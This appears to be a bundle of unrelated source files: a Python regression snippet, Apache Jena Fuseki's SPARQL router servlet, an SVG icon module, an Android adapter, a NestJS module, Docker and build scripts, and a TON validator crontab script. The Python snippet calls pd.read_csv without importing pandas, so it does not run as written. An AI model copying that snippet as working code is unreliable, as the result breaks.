import numpy as np
from sklearn.linear_model import LinearRegression
# Read the dataset from disk.
# NOTE(review): assumes 'data.csv' has at least 5 columns — the first four
# are features and the fifth is the target; confirm against the data file.
data = pd.read_csv('data.csv')
# Separate the features and targets
X = data.iloc[:, 0:4] # independent variables (first four columns)
y = data.iloc[:, 4] # target variable (fifth column)
# Create an instance of a linear regression model
model = LinearRegression()
# Fit model to training data
model.fit(X, y)
# Make predictions (on the same rows the model was trained on — no held-out set).
predictions = model.predict(X)
# Determine whether a customer should be contacted or not.
# NOTE(review): thresholding linear-regression output at 0.5 treats this as
# binary classification; LogisticRegression would be the conventional model.
# Confirm intent before changing.
contacted = np.where(predictions > 0.5, "Yes", "No")
print(contacted)
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.jena.fuseki.servlets;
import static java.lang.String.format ;
import static org.apache.jena.riot.WebContent.contentTypeSPARQLQuery ;
import static org.apache.jena.riot.WebContent.contentTypeSPARQLUpdate ;
import java.io.IOException ;
import java.util.List ;
import javax.servlet.ServletException ;
import javax.servlet.http.HttpServletRequest ;
import javax.servlet.http.HttpServletResponse ;
import org.apache.jena.atlas.web.MediaType ;
import org.apache.jena.fuseki.DEF ;
import org.apache.jena.fuseki.Fuseki ;
import org.apache.jena.fuseki.FusekiException ;
import org.apache.jena.fuseki.conneg.ConNeg ;
import org.apache.jena.fuseki.server.DataAccessPoint ;
import org.apache.jena.fuseki.server.DataService ;
import org.apache.jena.fuseki.server.Endpoint ;
import org.apache.jena.fuseki.server.OperationName ;
import org.apache.jena.riot.web.HttpNames ;
/** This servlet can be attached to a dataset location
* and acts as a router for all SPARQL operations
* (query, update, graph store, both direct and
* indirect naming, quads operations on a dataset and
* ?query and ?update directly on a dataset.)
*/
public abstract class SPARQL_UberServlet extends ActionSPARQL
{
protected abstract boolean allowQuery(HttpAction action) ;
protected abstract boolean allowUpdate(HttpAction action) ;
protected abstract boolean allowREST_R(HttpAction action) ;
protected abstract boolean allowREST_W(HttpAction action) ;
protected abstract boolean allowQuadsR(HttpAction action) ;
protected abstract boolean allowQuadsW(HttpAction action) ;
/** Router that permits only read operations (query, GSP read, quads read). */
public static class ReadOnly extends SPARQL_UberServlet
{
public ReadOnly() { super() ; }
@Override protected boolean allowQuery(HttpAction action) { return true ; }
@Override protected boolean allowUpdate(HttpAction action) { return false ; }
@Override protected boolean allowREST_R(HttpAction action) { return true ; }
@Override protected boolean allowREST_W(HttpAction action) { return false ; }
@Override protected boolean allowQuadsR(HttpAction action) { return true ; }
@Override protected boolean allowQuadsW(HttpAction action) { return false ; }
}
/** Router that permits every operation, both read and write. */
public static class ReadWrite extends SPARQL_UberServlet
{
public ReadWrite() { super() ; }
@Override protected boolean allowQuery(HttpAction action) { return true ; }
@Override protected boolean allowUpdate(HttpAction action) { return true ; }
@Override protected boolean allowREST_R(HttpAction action) { return true ; }
@Override protected boolean allowREST_W(HttpAction action) { return true ; }
@Override protected boolean allowQuadsR(HttpAction action) { return true ; }
@Override protected boolean allowQuadsW(HttpAction action) { return true ; }
}
/** Router whose permissions come from the dataset's configured endpoints:
 *  an operation is allowed iff the DataService has an endpoint for it. */
public static class AccessByConfig extends SPARQL_UberServlet
{
public AccessByConfig() { super() ; }
@Override protected boolean allowQuery(HttpAction action) { return isEnabled(action, OperationName.Query) ; }
@Override protected boolean allowUpdate(HttpAction action) { return isEnabled(action, OperationName.Update) ; }
@Override protected boolean allowREST_R(HttpAction action) { return isEnabled(action, OperationName.GSP_R) || isEnabled(action, OperationName.GSP_RW) ; }
@Override protected boolean allowREST_W(HttpAction action) { return isEnabled(action, OperationName.GSP_RW) ; }
@Override protected boolean allowQuadsR(HttpAction action) { return isEnabled(action, OperationName.Quads_R) || isEnabled(action, OperationName.Quads_RW) ; }
@Override protected boolean allowQuadsW(HttpAction action) { return isEnabled(action, OperationName.Quads_RW) ; }
// Test whether there is a configuration that allows this action as the operation given.
// Ignores the operation in the action (set due to parsing - it might be "quads"
// which is the generic operation when just the dataset is specificed.
private boolean isEnabled(HttpAction action, OperationName opName) {
// Disregard the operation name of the action
DataService dSrv = action.getDataService() ;
if ( dSrv == null )
return false;
return ! dSrv.getOperation(opName).isEmpty() ;
}
}
/* This can be used for a single servlet for everything (über-servlet)
*
* It can check for a request that looks like a service request and passes it on.
* This takes precedence over direct naming.
*/
// Delegate servlets, one per concrete SPARQL operation; requests are routed
// to exactly one of these by executeAction.
private final ActionSPARQL queryServlet = new SPARQL_QueryDataset() ;
private final ActionSPARQL updateServlet = new SPARQL_Update() ;
private final ActionSPARQL uploadServlet = new SPARQL_Upload() ;
private final ActionSPARQL gspServlet_R = new SPARQL_GSP_R() ;
private final ActionSPARQL gspServlet_RW = new SPARQL_GSP_RW() ;
private final ActionSPARQL restQuads_R = new REST_Quads_R() ; // XXX
private final ActionSPARQL restQuads_RW = new REST_Quads_RW() ;
public SPARQL_UberServlet() { super(); }
/** Return the URL path of the first endpoint under the given dataset name,
 *  or null when there are no endpoints. Ensures exactly one "/" separates
 *  the dataset name and the endpoint name. */
private String getEPName(String dsname, List<String> endpoints) {
    if ( endpoints == null || endpoints.isEmpty() )
        return null ;
    String ep = endpoints.get(0) ;
    return dsname.endsWith("/") ? dsname + ep : dsname + "/" + ep ;
}
// These calls should not happen because we hook in at executeAction
// These calls should not happen because we hook in at executeAction;
// reaching either indicates a dispatch bug, so fail loudly.
@Override protected void validate(HttpAction action) { throw new FusekiException("Call to SPARQL_UberServlet.validate") ; }
@Override protected void perform(HttpAction action) { throw new FusekiException("Call to SPARQL_UberServlet.perform") ; }
/** Map request to uri in the registry, choosing the longest matching
 *  dataset name. Returns null when no mapping is found.
 */
@Override
protected String mapRequestToDataset(HttpAction action) {
// Strip the servlet context path before matching against dataset names.
String uri = ActionLib.removeContextPath(action) ;
return ActionLib.mapRequestToDatasetLongest$(uri) ;
}
/** Intercept the processing cycle at the point where the action has been set up,
* the dataset target decided but no validation or execution has been done,
* nor any stats have been done.
*/
@Override
protected void executeAction(HttpAction action) {
long id = action.id ;
HttpServletRequest request = action.request ;
HttpServletResponse response = action.response ;
String actionURI = action.getActionURI() ; // No context path
String method = request.getMethod() ;
DataAccessPoint desc = action.getDataAccessPoint() ;
DataService dSrv = action.getDataService() ;
// if ( ! dSrv.isActive() )
// ServletOps.error(HttpSC.SERVICE_UNAVAILABLE_503, "Dataset not currently active");
// Part after the DataAccessPoint (dataset) name.
String trailing = findTrailing(actionURI, desc.getName()) ;
String qs = request.getQueryString() ;
boolean hasParams = request.getParameterMap().size() > 0 ;
// Test for parameters - includes HTML forms.
boolean hasParamQuery = request.getParameter(HttpNames.paramQuery) != null ;
// Include old name "request="
boolean hasParamUpdate = request.getParameter(HttpNames.paramUpdate) != null || request.getParameter(HttpNames.paramRequest) != null ;
boolean hasParamGraph = request.getParameter(HttpNames.paramGraph) != null ;
boolean hasParamGraphDefault = request.getParameter(HttpNames.paramGraphDefault) != null ;
String ct = request.getContentType() ;
String charset = request.getCharacterEncoding() ;
MediaType mt = null ;
if ( ct != null )
mt = MediaType.create(ct, charset) ;
if (action.log.isInfoEnabled() ) {
//String cxt = action.getContextPath() ;
action.log.info(format("[%d] %s %s :: '%s' :: %s ? %s", id, method, desc.getName(), trailing, (mt==null?"<none>":mt), (qs==null?"":qs))) ;
}
boolean hasTrailing = ( trailing.length() != 0 ) ;
if ( !hasTrailing && !hasParams ) {
// REST dataset.
boolean isGET = method.equals(HttpNames.METHOD_GET) ;
boolean isHEAD = method.equals(HttpNames.METHOD_HEAD) ;
// Check enabled.
if ( isGET || isHEAD ) {
if ( allowREST_R(action) )
restQuads_R.executeLifecycle(action) ;
else
ServletOps.errorMethodNotAllowed("Read-only dataset : "+method) ;
return ;
}
// If the read-only server has the same name as the writable server,
// and the default fro a read-only server is "/data", like a writable dataset,
// this test is insufficient.
if ( allowREST_W(action) )
restQuads_RW.executeLifecycle(action) ;
else
ServletOps.errorMethodNotAllowed("Read-only dataset : "+method) ;
return ;
}
if ( !hasTrailing ) {
boolean isPOST = action.getRequest().getMethod().equals(HttpNames.METHOD_POST) ;
// Nothing after the DataAccessPoint i.e Dataset by name.
// e.g. http://localhost:3030/ds?query=
// Query - GET or POST.
// Query - ?query= or body of application/sparql-query
if ( hasParamQuery || ( isPOST && contentTypeSPARQLQuery.equalsIgnoreCase(ct) ) ) {
// SPARQL Query
if ( !allowQuery(action) )
ServletOps.errorMethodNotAllowed("SPARQL query : "+method) ;
executeRequest(action, queryServlet) ;
return ;
}
// Insist on POST for update.
// Update - ?update= or body of application/sparql-update
if ( isPOST && ( hasParamUpdate || contentTypeSPARQLUpdate.equalsIgnoreCase(ct) ) ) {
// SPARQL Update
if ( !allowUpdate(action) )
ServletOps.errorMethodNotAllowed("SPARQL update : "+method) ;
executeRequest(action, updateServlet) ;
return ;
}
// ?graph=, ?default
if ( hasParamGraph || hasParamGraphDefault ) {
doGraphStoreProtocol(action) ;
return ;
}
ServletOps.errorBadRequest("Malformed request") ;
ServletOps.errorMethodNotAllowed("SPARQL Graph Store Protocol : "+method) ;
}
final boolean checkForPossibleService = true ;
if ( checkForPossibleService && action.getEndpoint() != null ) {
// There is a trailing part.
// Check it's not the same name as a registered service.
// If so, dispatch to that service.
if ( serviceDispatch(action, OperationName.Query, queryServlet) ) return ;
if ( serviceDispatch(action, OperationName.Update, updateServlet) ) return ;
if ( serviceDispatch(action, OperationName.Upload, uploadServlet) ) return ;
if ( hasParams ) {
if ( serviceDispatch(action, OperationName.GSP_R, gspServlet_R) ) return ;
if ( serviceDispatch(action, OperationName.GSP_RW, gspServlet_RW) ) return ;
} else {
// No parameters - do as a quads operation on the dataset.
if ( serviceDispatch(action, OperationName.GSP_R, restQuads_R) ) return ;
if ( serviceDispatch(action, OperationName.GSP_RW, restQuads_RW) ) return ;
}
}
// There is a trailing part - params are illegal by this point.
if ( hasParams )
// ?? Revisit to include query-on-one-graph
//errorBadRequest("Can't invoke a query-string service on a direct named graph") ;
ServletOps.errorNotFound("Not found: dataset='"+printName(desc.getName())+
"' service='"+printName(trailing)+
"' query string=?"+qs);
// There is a trailing part - not a service, no params ==> GSP direct naming.
if ( ! Fuseki.GSP_DIRECT_NAMING )
ServletOps.errorNotFound("Not found: dataset='"+printName(desc.getName())+"' service='"+printName(trailing)+"'");
doGraphStoreProtocol(action);
}
/**
 * Dispatch the request to {@code servlet} if the action's endpoint is
 * registered for the operation {@code opName}.
 *
 * @return true if the request was dispatched, false otherwise.
 */
private boolean serviceDispatch(HttpAction action, OperationName opName, ActionSPARQL servlet) {
    Endpoint ep = action.getEndpoint() ;
    // Not dispatchable unless an endpoint exists and it serves this operation.
    boolean dispatchable = ( ep != null ) && ep.isType(opName) ;
    if ( ! dispatchable )
        return false ;
    // NOTE: OPTIONS used to be special-cased here (see ServletBase.CORS_ENABLED);
    // it now flows through the normal execution path.
    executeRequest(action, servlet) ;
    return true ;
}
/** Strip a single leading "/" from a dataset/service name for display. */
private String printName(String x) {
    return x.startsWith("/") ? x.substring(1) : x ;
}
/**
 * Dispatch a SPARQL Graph Store Protocol request.
 * GET/HEAD go to the read service if allowed; all other methods go to the
 * read-write service. The GSP servlets themselves handle both direct and
 * indirect graph naming.
 */
private void doGraphStoreProtocol(HttpAction action) {
// The GSP servlets handle direct and indirect naming.
// NOTE(review): 'operation' is never used below — looks like dead code; confirm
// action.getEndpoint() has no needed side effect before removing.
Endpoint operation = action.getEndpoint() ;
String method = action.request.getMethod() ;
// Try to route to read service.
if ( HttpNames.METHOD_GET.equalsIgnoreCase(method) ||
HttpNames.METHOD_HEAD.equalsIgnoreCase(method) )
{
// Graphs Store Protocol, indirect naming, read operations
// Try to send to the R service, else drop through to RW service dispatch.
if ( ! allowREST_R(action))
ServletOps.errorForbidden("Forbidden: SPARQL Graph Store Protocol : Read operation : "+method) ;
executeRequest(action, gspServlet_R) ;
return ;
}
// Graphs Store Protocol, indirect naming, write (or read, though actually handled above)
// operations on the RW service.
if ( ! allowREST_W(action))
ServletOps.errorForbidden("Forbidden: SPARQL Graph Store Protocol : "+method) ;
executeRequest(action, gspServlet_RW) ;
return ;
}
/**
 * Execute the action with the given servlet. The active branch calls the
 * servlet lifecycle directly; the disabled branch documents the alternative
 * of going through the full HttpServlet.service machinery.
 */
private void executeRequest(HttpAction action, ActionSPARQL servlet) {
if ( true ) {
// Execute an ActionSPARQL.
// Bypasses HttpServlet.service to doMethod dispatch.
servlet.executeLifecycle(action) ;
return ;
}
// Deliberately dead branch, kept for reference/debugging.
if ( false ) {
// Execute by calling the whole servlet mechanism.
// This causes HttpServlet.service to call the appropriate doMethod.
// but the action, and the id, are not passed on and a new one is created.
try { servlet.service(action.request, action.response) ; }
catch (ServletException | IOException e) {
ServletOps.errorOccurred(e);
}
}
}
/**
 * Content-negotiate a quads response against the offered quad syntaxes
 * (default: N-Quads), setting the response content type and charset when a
 * match is found.
 * NOTE(review): method name misspells "Negotiation"; renaming would break
 * callers, so it is kept as-is.
 *
 * @return the chosen media type, or null if none acceptable.
 */
protected static MediaType contentNegotationQuads(HttpAction action) {
MediaType mt = ConNeg.chooseContentType(action.request, DEF.quadsOffer, DEF.acceptNQuads) ;
if ( mt == null )
return null ;
if ( mt.getContentType() != null )
action.response.setContentType(mt.getContentType());
if ( mt.getCharset() != null )
action.response.setCharacterEncoding(mt.getCharset()) ;
return mt ;
}
/**
 * Find the part after the dataset name: the service name or, for direct
 * naming, the graph name. Assumes {@code uri} is "dsname" or "dsname/trailing".
 */
protected String findTrailing(String uri, String dsname) {
    int n = dsname.length() ;
    // Skip the separating "/" when there is anything after the dataset name.
    return ( uri.length() > n ) ? uri.substring(n + 1) : "" ;
}
// Route everything to "doCommon".
// All HTTP verbs funnel into the single dispatcher above, which decides the
// concrete operation per request rather than per servlet method.
@Override
protected void doHead(HttpServletRequest request, HttpServletResponse response)
{ doCommon(request, response) ; }
@Override
protected void doGet(HttpServletRequest request, HttpServletResponse response)
{ doCommon(request, response) ; }
@Override
protected void doPost(HttpServletRequest request, HttpServletResponse response)
{ doCommon(request, response) ; }
@Override
protected void doOptions(HttpServletRequest request, HttpServletResponse response)
{ doCommon(request, response) ; }
@Override
protected void doPut(HttpServletRequest request, HttpServletResponse response)
{ doCommon(request, response) ; }
@Override
protected void doDelete(HttpServletRequest request, HttpServletResponse response)
{ doCommon(request, response) ; }
}
|
<reponame>lananh265/social-network
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.ic_schedule_send = void 0;
var ic_schedule_send = {
"viewBox": "0 0 24 24",
"children": [{
"name": "path",
"attribs": {
"d": "M0 0h24v24H0V0z",
"fill": "none"
},
"children": []
}, {
"name": "path",
"attribs": {
"d": "M16.5 12.5H15v4l3 2 .75-1.23-2.25-1.52V12.5zM16 9L2 3v7l9 2-9 2v7l7.27-3.11C10.09 20.83 12.79 23 16 23c3.86 0 7-3.14 7-7s-3.14-7-7-7zm0 12c-2.75 0-4.98-2.22-5-4.97v-.07c.02-2.74 2.25-4.97 5-4.97 2.76 0 5 2.24 5 5S18.76 21 16 21z"
},
"children": []
}]
};
exports.ic_schedule_send = ic_schedule_send; |
package biz.franch.protoi2.lists;
import android.content.Context;
import android.graphics.Bitmap;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.BaseAdapter;
import android.widget.ImageView;
import com.nostra13.universalimageloader.core.DisplayImageOptions;
import com.nostra13.universalimageloader.core.display.FadeInBitmapDisplayer;
import com.nostra13.universalimageloader.core.display.RoundedBitmapDisplayer;
import com.nostra13.universalimageloader.core.listener.ImageLoadingListener;
import com.nostra13.universalimageloader.core.listener.SimpleImageLoadingListener;
import com.squareup.picasso.Picasso;
import java.util.ArrayList;
import java.util.Collections;
import java.util.LinkedList;
import java.util.List;
import biz.franch.protoi2.R;
import de.hdodenhof.circleimageview.CircleImageView;
/**
 * Grid adapter that shows one circular service image per cell.
 * Images are loaded with Picasso; a Universal Image Loader configuration is
 * also built in the constructor but the UIL call is commented out below —
 * presumably a leftover from a migration (TODO confirm and remove).
 * Created by Admin on 24.06.2015.
 */
public class AdapterGridServices extends BaseAdapter{
// Backing data: one AttributesList per grid cell.
ArrayList<AttributesList> arrayLists;
LayoutInflater inflater;
Context context;
private ImageLoadingListener animateFirstListener = new AnimateFirstDisplayListener();
private DisplayImageOptions options;
public AdapterGridServices(Context context, ArrayList<AttributesList> arrayLists) {
this.context = context;
this.arrayLists = arrayLists;
inflater = LayoutInflater.from(context);
// UIL display options (placeholder/error drawables, caching, rounded corners).
// Only used by the commented-out ImageLoader call in getView().
options = new DisplayImageOptions.Builder()
.showImageOnLoading(R.drawable.ic_stub)
.showImageForEmptyUri(R.drawable.ic_empty)
.showImageOnFail(R.drawable.ic_error)
.cacheInMemory(true)
.cacheOnDisk(true)
.considerExifParams(true)
.displayer(new RoundedBitmapDisplayer(20)).build();
}
@Override
public int getCount() {
return arrayLists.size();
}
@Override
public Object getItem(int i) {
return arrayLists.get(i);
}
@Override
public long getItemId(int i) {
// No stable IDs are provided; every item reports 0.
return 0;
}
@Override
public View getView(int position, View convertView, ViewGroup parent) {
// Standard view-holder recycling pattern.
ViewHolder view;
if(convertView==null) {
view = new ViewHolder();
convertView = inflater.inflate(R.layout.item_lists_view_grid, null);
view.imageView = (CircleImageView) convertView.findViewById(R.id.imageViewGrid);
convertView.setTag(view);
}
else {
view = (ViewHolder) convertView.getTag();
}
// ImageLoader.getInstance().displayImage(arrayLists.get(position).getUrlImage(), view.imageView, options, animateFirstListener);
Picasso.with(context)
.load(arrayLists.get(position).getUrlImage())
.into(view.imageView);
return convertView;
}
// Holds the single image view of a grid cell for recycling.
public class ViewHolder {
public CircleImageView imageView;
}
// UIL listener that fades an image in the first time its URI is displayed.
// Unused while the Picasso path is active (see getView).
private static class AnimateFirstDisplayListener extends SimpleImageLoadingListener {
static final List<String> displayedImages = Collections.synchronizedList(new LinkedList<String>());
@Override
public void onLoadingComplete(String imageUri, View view, Bitmap loadedImage) {
if (loadedImage != null) {
ImageView imageView = (ImageView) view;
boolean firstDisplay = !displayedImages.contains(imageUri);
if (firstDisplay) {
FadeInBitmapDisplayer.animate(imageView, 500);
displayedImages.add(imageUri);
}
}
}
}
}
|
<reponame>Pharma-Go/back-end
import { Module } from '@nestjs/common';
import { EstablishmentService } from './establishment.service';
import { TypeOrmModule } from '@nestjs/typeorm';
import { Establishment } from './establishment.entity';
import { EstablishmentController } from './establishment.controller';
import { ProductModule } from 'src/product/product.module';
import { UserModule } from 'src/user/user.module';
import { CategoryModule } from 'src/category/category.module';

// Feature module for establishments: registers the TypeORM repository,
// exposes the REST controller, and exports the service for other modules
// (user/category/product modules are imported as collaborating features).
@Module({
imports: [
TypeOrmModule.forFeature([Establishment]),
UserModule,
CategoryModule,
ProductModule,
],
controllers: [EstablishmentController],
providers: [EstablishmentService],
exports: [EstablishmentService],
})
export class EstablishmentModule {}
|
#!/bin/sh
# Container entrypoint: export build metadata, run the DB task selected by
# $DOCKER_STATE (create / migrate / development-setup / reset), then start puma.

# Make these available via Settings in the app
export SETTINGS__GIT_COMMIT="$APP_GIT_COMMIT"
export SETTINGS__BUILD_DATE="$APP_BUILD_DATE"
export SETTINGS__GIT_SOURCE="$APP_BUILD_TAG"
case ${DOCKER_STATE} in
create)
echo "running create"
bundle exec rails db:setup
;;
migrate)
echo "running migrate"
bundle exec rails db:migrate
;;
development-setup)
echo "setting up db"
rails db:setup
echo "migrating db"
rails db:migrate
echo "seeding db for dev"
rails db:seed
;;
reset)
# FIX: [[ ... || ... ]] is a bashism and fails under POSIX /bin/sh (dash);
# use two portable [ ] tests instead.
if [ "$ENV" = staging ] || [ "$ENV" = prod ]
then
echo "cannot reset DB in staging or prod, see"
echo "https://dsdmoj.atlassian.net/wiki/display/CD/Resetting+the+DB+in+Deployed+Environments"
echo "for instructions on how to do this manually."
else
echo "running DB reset"
bundle exec rails db:reset
fi
;;
esac
# Always start the app server after the one-shot DB task.
bundle exec puma -C config/puma.rb
|
#!/bin/sh
# Out-of-source Debug build. -p makes re-runs idempotent (plain `mkdir build`
# errors when the directory already exists); guard `cd` so cmake/make never
# run in the wrong directory if it fails.
mkdir -p build
cd build || exit 1
cmake .. -DCMAKE_BUILD_TYPE=Debug
make
|
#!/usr/bin/env bash
set -eE
# (C) Sergey Tyurin 2021-10-19 10:00:00
# Disclaimer
##################################################################################################################
# You running this script/function means you will not blame the author(s)
# if this breaks your stuff. This script/function is provided AS IS without warranty of any kind.
# Author(s) disclaim all implied warranties including, without limitation,
# any implied warranties of merchantability or of fitness for a particular purpose.
# The entire risk arising out of the use or performance of the sample scripts and documentation remains with you.
# In no event shall author(s) be held liable for any damages whatsoever
# (including, without limitation, damages for loss of business profits, business interruption,
# loss of business information, or other pecuniary loss) arising out of the use of or inability
# to use the script or documentation. Neither this script/function,
# nor any part of it other than those parts that are explicitly copied from others,
# may be republished without author(s) express written permission.
# Author(s) retain the right to alter this disclaimer at any time.
##################################################################################################################
# Installs crontab entries that run the validator election scripts at the
# right times for the next election cycle.
echo
echo "############################## Set crontab for next elections ##################################"
echo "INFO: $(basename "$0") BEGIN $(date +%s) / $(date +'%F %T %Z')"
# ===================================================
# Resolve the directory this script lives in and pull in shared env/functions.
SCRIPT_DIR=`cd "$(dirname "${BASH_SOURCE[0]}")" && pwd -P`
source "${SCRIPT_DIR}/env.sh"
source "${SCRIPT_DIR}/functions.shinc"
# Determine which user owns the crontab we will install.
SCRPT_USER=$USER
USER_HOME=$HOME
[[ -z "$SCRPT_USER" ]] && SCRPT_USER=$LOGNAME
[[ -n $(echo "$USER_HOME"|grep 'root') ]] && SCRPT_USER="root"
#=================================================
echo -e "$(DispEnvInfo)"
echo
echo -e "$(Determine_Current_Network)"
echo
# Ensure work/history directories exist (paths come from env.sh).
[[ ! -d $ELECTIONS_WORK_DIR ]] && mkdir -p $ELECTIONS_WORK_DIR
[[ ! -d $ELECTIONS_HISTORY_DIR ]] && mkdir -p $ELECTIONS_HISTORY_DIR
# ===================================================
# Print "minute hour" (crontab time fields) for a unix timestamp ($1).
# GNU/Linux date reads timestamps via `-d @N`; BSD date via `-r N`.
# FIX: quote "$ival" to avoid word splitting; drop the redundant
# echo-"$( ... )" wrapper around date.
function GET_M_H() {
OS_SYSTEM=$(uname -s)
ival="${1}"
if [[ "$OS_SYSTEM" == "Linux" ]];then
date +'%M %H' -d @"$ival"
else
date -r "$ival" +'%M %H'
fi
}
#######################################################################################################
#===================================================
# Get current election cycle info.
# Reads config params 15 (timings), 34 (current validators) and 36 (next
# validators) either via the DApp endpoint ($CALL_TC) or directly from a
# RUST/CPP node, then derives:
#   CURR_VAL_UNTIL - end of the current validator set
#   VAL_DUR        - validators_elected_for
#   STRT_BEFORE    - elections_start_before
#   EEND_BEFORE    - elections_end_before
elector_addr=$(Get_Elector_Address)
echo "INFO: Elector Address: $elector_addr"
election_id=$(Get_Current_Elections_ID)
echo "INFO: Current Election ID: $election_id"
if $FORCE_USE_DAPP ;then
ELECT_TIME_PAR=$($CALL_TC -j getconfig 15)
LIST_CURR_VALS=$($CALL_TC -j getconfig 34)
LIST_NEXT_VALS=$($CALL_TC -j getconfig 36)
declare -i CURR_VAL_UNTIL=`echo "${LIST_CURR_VALS}" | jq -r '.utime_until'` # utime_until
# election_id == 0 means no elections are running; anchor on utime_since
# of the current (or, if already elected, the next) validator set instead.
if [[ "$election_id" == "0" ]];then
CURR_VAL_UNTIL=`echo "${LIST_CURR_VALS}" | jq -r '.utime_since'` # utime_until
if [[ "$(echo "${LIST_NEXT_VALS}"|head -n 1)" != 'null' ]];then
CURR_VAL_UNTIL=`echo "${LIST_NEXT_VALS}" | jq -r '.utime_since'` # utime_since
fi
fi
declare -i VAL_DUR=`echo "${ELECT_TIME_PAR}" | jq -r '.validators_elected_for'` # validators_elected_for
declare -i STRT_BEFORE=`echo "${ELECT_TIME_PAR}" | jq -r '.elections_start_before'` # elections_start_before
declare -i EEND_BEFORE=`echo "${ELECT_TIME_PAR}" | jq -r '.elections_end_before' ` # elections_end_before
else
case "$NODE_TYPE" in
RUST)
# Rust node wraps values under .p15/.p34/.p36.
ELECT_TIME_PAR=$($CALL_RC -j -c "getconfig 15"|sed 's/config param: //')
LIST_CURR_VALS=$($CALL_RC -j -c "getconfig 34"|sed 's/config param: //')
LIST_NEXT_VALS=$($CALL_RC -j -c "getconfig 36"|sed 's/config param: //')
declare -i CURR_VAL_UNTIL=`echo "${LIST_CURR_VALS}" | jq -r '.p34.utime_until'` # utime_until
if [[ "$election_id" == "0" ]];then
CURR_VAL_UNTIL=`echo "${LIST_CURR_VALS}" | jq -r '.p34.utime_since'` # utime_until
if [[ "$(echo "${LIST_NEXT_VALS}"|head -n 1)" != '{}' ]];then
CURR_VAL_UNTIL=`echo "${LIST_NEXT_VALS}" | jq -r '.p36.utime_since'` # utime_since
fi
fi
declare -i VAL_DUR=`echo "${ELECT_TIME_PAR}" | jq -r '.p15.validators_elected_for'` # validators_elected_for
declare -i STRT_BEFORE=`echo "${ELECT_TIME_PAR}" | jq -r '.p15.elections_start_before'` # elections_start_before
declare -i EEND_BEFORE=`echo "${ELECT_TIME_PAR}" | jq -r '.p15.elections_end_before' ` # elections_end_before
;;
CPP)
# C++ lite-client prints text, not JSON; values are scraped with awk.
# ConfigParam(34) = (
# cur_validators:(validators_ext utime_since:1632812112 utime_until:1632822912 total:16 main:16 total_weight:1152921504606846968
ELECT_TIME_PAR=`$CALL_LC -rc "getconfig 15" -t "3" -rc "quit" 2>/dev/null`
LIST_CURR_VALS=`$CALL_LC -rc "getconfig 34" -t "3" -rc "quit" 2>/dev/null`
LIST_NEXT_VALS=`$CALL_LC -rc "getconfig 36" -t "3" -rc "quit" 2>/dev/null`
declare -i CURR_VAL_UNTIL=`echo "${LIST_CURR_VALS}" | grep -i "cur_validators" | awk -F ":" '{print $4}'|awk '{print $1}'` # utime_until
NEXT_VAL_EXIST=`echo "${LIST_NEXT_VALS}"| grep -i "ConfigParam(36)" | grep -i 'null'` # Config p36: null
if [[ "$election_id" == "0" ]];then
CURR_VAL_UNTIL=`echo "${LIST_CURR_VALS}" | grep -i "cur_validators" | awk -F ":" '{print $3}'|awk '{print $1}'` # utime_until
if [[ -z "$NEXT_VAL_EXIST" ]];then
CURR_VAL_UNTIL=`echo "${LIST_NEXT_VALS}" | grep -i "next_validators" | awk -F ":" '{print $3}'|awk '{print $1}'` # next utime_since = curr utime_until
fi
fi
declare -i VAL_DUR=`echo "${ELECT_TIME_PAR}" | grep -i "ConfigParam(15)" | awk -F ":" '{print $2}' |awk '{print $1}'` # validators_elected_for
declare -i STRT_BEFORE=`echo "${ELECT_TIME_PAR}" | grep -i "ConfigParam(15)" | awk -F ":" '{print $3}' |awk '{print $1}'` # elections_start_before
declare -i EEND_BEFORE=`echo "${ELECT_TIME_PAR}" | grep -i "ConfigParam(15)" | awk -F ":" '{print $4}' |awk '{print $1}'` # elections_end_before
;;
*)
echo "###-ERROR(line $LINENO): Unknown node type! Set NODE_TYPE= to 'RUST' or CPP' in env.sh"
exit 1
;;
esac
fi
#===================================================
# Crontab times for the PREVIOUS (current) cycle: five staggered slots,
# each TIME_SHIFT seconds apart, starting at election opening + DELAY_TIME.
PREV_ELECTION_TIME=$((CURR_VAL_UNTIL - STRT_BEFORE + TIME_SHIFT + DELAY_TIME))
PREV_ELECTION_SECOND_TIME=$(($PREV_ELECTION_TIME + $TIME_SHIFT))
PREV_ADNL_TIME=$(($PREV_ELECTION_SECOND_TIME + $TIME_SHIFT))
PREV_BAL_TIME=$(($PREV_ADNL_TIME + $TIME_SHIFT))
PREV_CHG_TIME=$(($PREV_BAL_TIME + $TIME_SHIFT))
PRV_ELECT_1=$(GET_M_H "$PREV_ELECTION_TIME")
PRV_ELECT_2=$(GET_M_H "$PREV_ELECTION_SECOND_TIME")
PRV_ELECT_3=$(GET_M_H "$PREV_ADNL_TIME")
PRV_ELECT_4=$(GET_M_H "$PREV_BAL_TIME")
PRV_ELECT_5=$(GET_M_H "$PREV_CHG_TIME")
#===================================================
# Same five slots for the NEXT cycle (one validation period later).
NEXT_ELECTION_TIME=$((CURR_VAL_UNTIL + VAL_DUR - STRT_BEFORE + $TIME_SHIFT + DELAY_TIME))
NEXT_ELECTION_SECOND_TIME=$(($NEXT_ELECTION_TIME + $TIME_SHIFT))
NEXT_ADNL_TIME=$(($NEXT_ELECTION_SECOND_TIME + $TIME_SHIFT))
NEXT_BAL_TIME=$(($NEXT_ADNL_TIME + $TIME_SHIFT))
NEXT_CHG_TIME=$(($NEXT_BAL_TIME + $TIME_SHIFT))
NXT_ELECT_1=$(GET_M_H "$NEXT_ELECTION_TIME")
NXT_ELECT_2=$(GET_M_H "$NEXT_ELECTION_SECOND_TIME")
NXT_ELECT_3=$(GET_M_H "$NEXT_ADNL_TIME")
NXT_ELECT_4=$(GET_M_H "$NEXT_BAL_TIME")
NXT_ELECT_5=$(GET_M_H "$NEXT_CHG_TIME")
# Time to fetch the participant list: just before elections close.
GET_PART_LIST_TIME=$((election_id - EEND_BEFORE))
GPL_TIME_MH=$(GET_M_H "$GET_PART_LIST_TIME")
#===================================================
